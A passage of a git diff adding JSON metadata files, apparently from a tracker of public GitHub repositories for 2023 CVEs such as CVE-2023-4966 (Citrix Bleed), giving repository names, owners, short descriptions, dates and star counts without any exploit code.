mode 100644 index 0000000000..1ab58283d1 --- /dev/null +++ b/2023/CVE-2023-49339.json @@ -0,0 +1,33 @@ +[ + { + "id": 744744997, + "name": "CVE-2023-49339", + "full_name": "3zizme\/CVE-2023-49339", + "owner": { + "login": "3zizme", + "id": 75446753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75446753?v=4", + "html_url": "https:\/\/github.com\/3zizme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3zizme\/CVE-2023-49339", + "description": "Critical Security Vulnerability in Ellucian Banner System", + "fork": false, + "created_at": "2024-01-17T23:18:29Z", + "updated_at": "2024-04-11T18:26:35Z", + "pushed_at": "2024-01-17T23:20:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49438.json b/2023/CVE-2023-49438.json new file mode 100644 index 0000000000..cadb77a6b9 --- /dev/null +++ b/2023/CVE-2023-49438.json @@ -0,0 +1,33 @@ +[ + { + "id": 731811886, + "name": "CVE-2023-49438", + "full_name": "brandon-t-elliott\/CVE-2023-49438", + "owner": { + "login": "brandon-t-elliott", + "id": 126433368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126433368?v=4", + "html_url": "https:\/\/github.com\/brandon-t-elliott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brandon-t-elliott\/CVE-2023-49438", + "description": "CVE-2023-49438 - Open Redirect Vulnerability in Flask-Security-Too", + "fork": false, + "created_at": "2023-12-14T23:58:42Z", + "updated_at": "2024-11-11T07:19:29Z", + "pushed_at": "2023-12-30T02:02:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49453.json b/2023/CVE-2023-49453.json new file mode 100644 index 0000000000..e85c28074a --- /dev/null +++ b/2023/CVE-2023-49453.json @@ -0,0 +1,33 @@ +[ + { + "id": 769446859, + "name": "CVE-2023-49453", + "full_name": "nitipoom-jar\/CVE-2023-49453", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-49453", + "description": null, + "fork": false, + "created_at": "2024-03-09T05:15:02Z", + "updated_at": "2024-03-09T05:15:36Z", + "pushed_at": "2024-03-09T05:19:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49471.json b/2023/CVE-2023-49471.json new file mode 100644 index 0000000000..317e23cf8d --- /dev/null +++ b/2023/CVE-2023-49471.json @@ -0,0 +1,33 @@ +[ + { + "id": 735350717, + "name": "CVE-2023-49471", + "full_name": "zunak\/CVE-2023-49471", + "owner": { + "login": "zunak", + "id": 14941490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4", + "html_url": "https:\/\/github.com\/zunak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zunak\/CVE-2023-49471", + "description": null, + "fork": false, + "created_at": "2023-12-24T15:40:24Z", + "updated_at": "2023-12-24T15:42:33Z", + "pushed_at": "2023-12-24T15:44:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49496.json b/2023/CVE-2023-49496.json new file mode 100644 index 0000000000..689a394096 --- /dev/null +++ b/2023/CVE-2023-49496.json @@ -0,0 +1,33 @@ +[ + { + "id": 760186862, + "name": "CVE-2023-49496", + "full_name": "HuangYanQwQ\/CVE-2023-49496", + "owner": { + "login": "HuangYanQwQ", + "id": 155517523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155517523?v=4", + "html_url": "https:\/\/github.com\/HuangYanQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuangYanQwQ\/CVE-2023-49496", + "description": null, + "fork": false, + "created_at": "2024-02-20T00:11:52Z", + "updated_at": "2024-02-20T00:11:52Z", + "pushed_at": "2024-02-20T00:11:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49539.json b/2023/CVE-2023-49539.json new file mode 100644 index 0000000000..5bd4c133bf --- /dev/null +++ b/2023/CVE-2023-49539.json @@ -0,0 +1,33 @@ +[ + { + "id": 733656217, + "name": "CVE-2023-49539", + "full_name": "geraldoalcantara\/CVE-2023-49539", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49539", + "description": "Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in \"index.php\/category\" - vulnerable field: \"Category Name\"", + "fork": false, + "created_at": "2023-12-19T20:31:36Z", + "updated_at": "2023-12-20T09:41:30Z", + "pushed_at": "2023-12-20T07:56:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49540.json b/2023/CVE-2023-49540.json new file mode 100644 index 0000000000..4cd3deaaa8 --- /dev/null +++ b/2023/CVE-2023-49540.json @@ -0,0 +1,33 @@ +[ + { + "id": 733661228, + "name": "CVE-2023-49540", + "full_name": "geraldoalcantara\/CVE-2023-49540", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49540", + "description": "Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in \/index.php\/history - vulnerable field: \"Customer's Name\".", + "fork": false, + "created_at": "2023-12-19T20:50:09Z", + "updated_at": "2023-12-20T09:42:07Z", + "pushed_at": "2023-12-20T08:08:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49543.json b/2023/CVE-2023-49543.json new file mode 100644 index 0000000000..de1b4f3579 --- /dev/null +++ b/2023/CVE-2023-49543.json @@ -0,0 +1,33 @@ +[ + { + "id": 733666604, + "name": "CVE-2023-49543", + "full_name": "geraldoalcantara\/CVE-2023-49543", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49543", + "description": "Book Store Management System v1.0 - Incorrect Access Control ", + "fork": false, + "created_at": "2023-12-19T21:10:14Z", + "updated_at": "2023-12-20T09:43:06Z", + "pushed_at": "2023-12-19T21:24:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49544.json b/2023/CVE-2023-49544.json new file mode 100644 index 0000000000..e76ea903cd --- /dev/null +++ b/2023/CVE-2023-49544.json @@ -0,0 +1,33 @@ +[ + { + "id": 724470555, + "name": "CVE-2023-49544", + "full_name": "geraldoalcantara\/CVE-2023-49544", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49544", + "description": "Customer Support System 1.0 - Local File Inclusion", + "fork": false, + "created_at": "2023-11-28T06:21:51Z", + "updated_at": "2023-12-20T09:43:54Z", + "pushed_at": "2023-12-19T20:29:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49545.json b/2023/CVE-2023-49545.json new file mode 100644 index 0000000000..48513ef343 --- /dev/null +++ b/2023/CVE-2023-49545.json @@ -0,0 +1,33 @@ +[ + { + "id": 724455925, + "name": "CVE-2023-49545", + "full_name": "geraldoalcantara\/CVE-2023-49545", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49545", + "description": "Customer Support System 1.0 - Directory Listing", + "fork": false, + "created_at": "2023-11-28T05:33:06Z", + "updated_at": "2023-12-20T09:45:15Z", + "pushed_at": "2023-12-19T21:52:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49546.json b/2023/CVE-2023-49546.json new file mode 100644 index 0000000000..0d2f10768c --- /dev/null +++ b/2023/CVE-2023-49546.json @@ -0,0 +1,33 @@ +[ + { + "id": 733677633, + "name": "CVE-2023-49546", + "full_name": "geraldoalcantara\/CVE-2023-49546", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49546", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"email\" Parameter During \"save_staff\" Operation", + "fork": false, + "created_at": "2023-12-19T21:54:36Z", + "updated_at": "2023-12-20T09:46:02Z", + "pushed_at": "2023-12-20T08:22:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49547.json b/2023/CVE-2023-49547.json new file mode 100644 index 0000000000..4bacc2a3ca --- /dev/null +++ b/2023/CVE-2023-49547.json @@ -0,0 +1,33 @@ +[ + { + "id": 724618079, + "name": "CVE-2023-49547", + "full_name": "geraldoalcantara\/CVE-2023-49547", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49547", + "description": "Customer Support System 1.0 - SQL Injection Login Bypass", + "fork": false, + "created_at": "2023-11-28T12:59:10Z", + "updated_at": "2023-12-20T09:47:00Z", + "pushed_at": "2023-12-19T22:26:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49548.json b/2023/CVE-2023-49548.json new file mode 100644 index 0000000000..8537d432b2 --- /dev/null +++ b/2023/CVE-2023-49548.json @@ -0,0 +1,33 @@ +[ + { + "id": 733685667, + "name": "CVE-2023-49548", + "full_name": "geraldoalcantara\/CVE-2023-49548", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49548", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"lastname\" Parameter During \"save_user\" Operation", + "fork": false, + "created_at": "2023-12-19T22:27:24Z", + "updated_at": "2023-12-20T09:47:44Z", + "pushed_at": "2023-12-20T08:27:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49606.json b/2023/CVE-2023-49606.json new file mode 100644 index 0000000000..e65d189a51 --- /dev/null +++ b/2023/CVE-2023-49606.json @@ -0,0 +1,33 @@ +[ + { + "id": 797160207, + "name": "CVE-2023-49606", + "full_name": "d0rb\/CVE-2023-49606", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-49606", + "description": "Critical use-after-free vulnerability discovered in Tinyproxy", + "fork": false, + "created_at": "2024-05-07T10:03:01Z", + "updated_at": "2024-09-27T15:41:52Z", + "pushed_at": "2024-05-07T10:11:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4966.json b/2023/CVE-2023-4966.json new file mode 100644 index 0000000000..ec1f288e29 --- /dev/null +++ b/2023/CVE-2023-4966.json @@ -0,0 +1,421 @@ +[ + { + "id": 709418839, + "name": "CVE-2023-4966", + "full_name": "Chocapikk\/CVE-2023-4966", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-4966", + "description": "Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. ", + "fork": false, + "created_at": "2023-10-24T17:19:32Z", + "updated_at": "2024-11-13T03:21:39Z", + "pushed_at": "2023-10-26T14:16:05Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "cve-2023-4966", + "exploit", + "exploitation", + "infosec", + "memory-leak", + "netscaler", + "network-security", + "open-source", + "pentesting", + "python", + "security", + "security-research", + "session-tokens", + "vulnerability" + ], + "visibility": "public", + "forks": 11, + "watchers": 73, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 709624306, + "name": "citrix_cve-2023-4966", + "full_name": "dinosn\/citrix_cve-2023-4966", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/citrix_cve-2023-4966", + "description": "Citrix CVE-2023-4966 from assetnote modified for parallel and file handling", + "fork": false, + "created_at": "2023-10-25T04:15:17Z", + "updated_at": "2024-07-25T13:30:51Z", + "pushed_at": "2023-10-25T04:30:14Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 709678513, + "name": "Netscaler-CVE-2023-4966-POC", + "full_name": "senpaisamp\/Netscaler-CVE-2023-4966-POC", + "owner": { + "login": "senpaisamp", + "id": 98622787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98622787?v=4", + "html_url": "https:\/\/github.com\/senpaisamp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/senpaisamp\/Netscaler-CVE-2023-4966-POC", + "description": "Proof Of Concept for te NetScaler Vuln", + "fork": false, + "created_at": "2023-10-25T07:17:54Z", + "updated_at": "2024-04-23T10:50:27Z", + "pushed_at": "2024-04-23T10:50:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709803873, + "name": "CVE-2023-4966-POC", + "full_name": "mlynchcogent\/CVE-2023-4966-POC", + "owner": { + "login": "mlynchcogent", + "id": 28465939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28465939?v=4", + "html_url": "https:\/\/github.com\/mlynchcogent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mlynchcogent\/CVE-2023-4966-POC", + "description": "Proof Of Concept for te NetScaler Vuln", + "fork": false, + "created_at": "2023-10-25T12:37:56Z", + "updated_at": "2024-03-25T08:59:25Z", + "pushed_at": "2023-10-25T08:29:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 710028645, + "name": "CVE-2023-4966", + "full_name": "IceBreakerCode\/CVE-2023-4966", + "owner": { + "login": "IceBreakerCode", + "id": 129914557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129914557?v=4", + "html_url": "https:\/\/github.com\/IceBreakerCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IceBreakerCode\/CVE-2023-4966", + "description": null, + "fork": false, + "created_at": "2023-10-25T21:34:43Z", + "updated_at": "2023-10-25T21:36:05Z", + "pushed_at": "2023-10-25T21:35:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710747980, + "name": "CVE-2023-4966", + "full_name": "0xKayala\/CVE-2023-4966", + "owner": { + "login": "0xKayala", + "id": 16838353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16838353?v=4", + "html_url": "https:\/\/github.com\/0xKayala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xKayala\/CVE-2023-4966", + "description": "CVE-2023-4966 - NetScaler ADC and NetScaler Gateway Memory Leak Exploit", + "fork": false, + "created_at": "2023-10-27T11:00:09Z", + "updated_at": "2023-10-28T06:02:58Z", + "pushed_at": "2023-10-28T06:47:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 711157442, + "name": "citrix-logchecker", + "full_name": "certat\/citrix-logchecker", + "owner": { + "login": "certat", + "id": 14126796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14126796?v=4", + "html_url": "https:\/\/github.com\/certat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/certat\/citrix-logchecker", + "description": "Parse citrix netscaler logs to check for signs of CVE-2023-4966 exploitation", + "fork": false, + "created_at": "2023-10-28T11:44:42Z", + "updated_at": "2024-06-27T06:22:21Z", + "pushed_at": "2023-11-03T17:09:05Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711541796, + "name": "CVE-2023-4966", + "full_name": "RevoltSecurities\/CVE-2023-4966", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-4966", + "description": "An Exploitation script developed to exploit the CVE-2023-4966 bleed citrix information disclosure vulnerability", + "fork": false, + "created_at": "2023-10-29T15:31:37Z", + "updated_at": "2024-07-10T17:55:56Z", + "pushed_at": "2023-10-29T17:43:05Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 721262627, + "name": "CVE-2023-4966", + "full_name": "s-bt\/CVE-2023-4966", + "owner": { + "login": "s-bt", + "id": 48731760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48731760?v=4", + "html_url": "https:\/\/github.com\/s-bt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-bt\/CVE-2023-4966", + "description": "Scripts to get infos", + "fork": false, + "created_at": "2023-11-20T17:32:16Z", + "updated_at": "2023-11-20T17:36:18Z", + "pushed_at": "2023-11-20T17:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724052502, + "name": "CVE-2023-4966", + "full_name": "byte4RR4Y\/CVE-2023-4966", + "owner": { + "login": "byte4RR4Y", + "id": 121404035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121404035?v=4", + "html_url": "https:\/\/github.com\/byte4RR4Y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byte4RR4Y\/CVE-2023-4966", + "description": "Programm to exploit a range of ip adresses", + "fork": false, + "created_at": "2023-11-27T09:51:30Z", + "updated_at": "2023-11-27T09:52:07Z", + "pushed_at": "2023-11-27T10:04:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729065658, + "name": "cve-2023-4966-iocs", + "full_name": "jmussmann\/cve-2023-4966-iocs", + "owner": { + "login": "jmussmann", + "id": 24474138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24474138?v=4", + "html_url": "https:\/\/github.com\/jmussmann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jmussmann\/cve-2023-4966-iocs", + "description": "Python script to search Citrix NetScaler logs for possible CVE-2023-4966 exploitation.", + "fork": false, + "created_at": "2023-12-08T10:28:15Z", + "updated_at": "2023-12-08T10:34:06Z", + "pushed_at": "2023-12-09T12:55:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732499705, + "name": "overread", + "full_name": "morganwdavis\/overread", + "owner": { + "login": "morganwdavis", + "id": 4434533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4434533?v=4", + "html_url": "https:\/\/github.com\/morganwdavis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/morganwdavis\/overread", + "description": "Simulates CVE-2023-4966 Citrix Bleed overread bug", + "fork": false, + "created_at": "2023-12-16T21:55:04Z", + "updated_at": "2024-04-22T12:46:33Z", + "pushed_at": "2023-12-31T10:40:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854445410, + "name": "CVE-2023-4966", + "full_name": "LucasOneZ\/CVE-2023-4966", + "owner": { + "login": "LucasOneZ", + "id": 122230924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122230924?v=4", + "html_url": "https:\/\/github.com\/LucasOneZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasOneZ\/CVE-2023-4966", + "description": null, + "fork": false, + "created_at": "2024-09-09T07:26:24Z", + "updated_at": "2024-09-14T13:42:06Z", + "pushed_at": "2024-09-14T13:42:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49950.json b/2023/CVE-2023-49950.json new file mode 100644 index 0000000000..d510a43b9c --- /dev/null +++ b/2023/CVE-2023-49950.json @@ -0,0 +1,33 @@ +[ + { + "id": 750788126, + "name": "cve-2023-49950", + "full_name": "shrikeinfosec\/cve-2023-49950", + "owner": { + "login": "shrikeinfosec", + "id": 107105450, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107105450?v=4", + "html_url": "https:\/\/github.com\/shrikeinfosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shrikeinfosec\/cve-2023-49950", + "description": "A write-up detailing CVE-2023-49950. Affects Logpoint SIEM v6.1.0-v7.3.0", + "fork": false, + "created_at": "2024-01-31T10:18:12Z", + "updated_at": "2024-01-31T12:04:55Z", + "pushed_at": "2024-01-31T12:10:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49954.json b/2023/CVE-2023-49954.json new file mode 100644 index 0000000000..34970572bd --- /dev/null +++ b/2023/CVE-2023-49954.json @@ -0,0 +1,33 @@ +[ + { + "id": 731730712, + "name": "CVE-2023-49954.github.io", + "full_name": "CVE-2023-49954\/CVE-2023-49954.github.io", + "owner": { + "login": "CVE-2023-49954", + "id": 153858003, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153858003?v=4", + "html_url": "https:\/\/github.com\/CVE-2023-49954", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CVE-2023-49954\/CVE-2023-49954.github.io", + "description": "SQL Injection in 3CX CRM Integration", + "fork": false, + "created_at": "2023-12-14T18:38:28Z", + "updated_at": "2023-12-19T21:05:59Z", + "pushed_at": "2023-12-18T07:00:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49964.json b/2023/CVE-2023-49964.json new file mode 100644 index 0000000000..ff24a84225 --- /dev/null +++ b/2023/CVE-2023-49964.json @@ -0,0 +1,43 @@ +[ + { + "id": 729296630, + "name": "CVE-2023-49964", + "full_name": "mbadanoiu\/CVE-2023-49964", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-49964", + "description": "CVE-2023-49964: FreeMarker Server-Side Template Injection in Alfresco", + "fork": 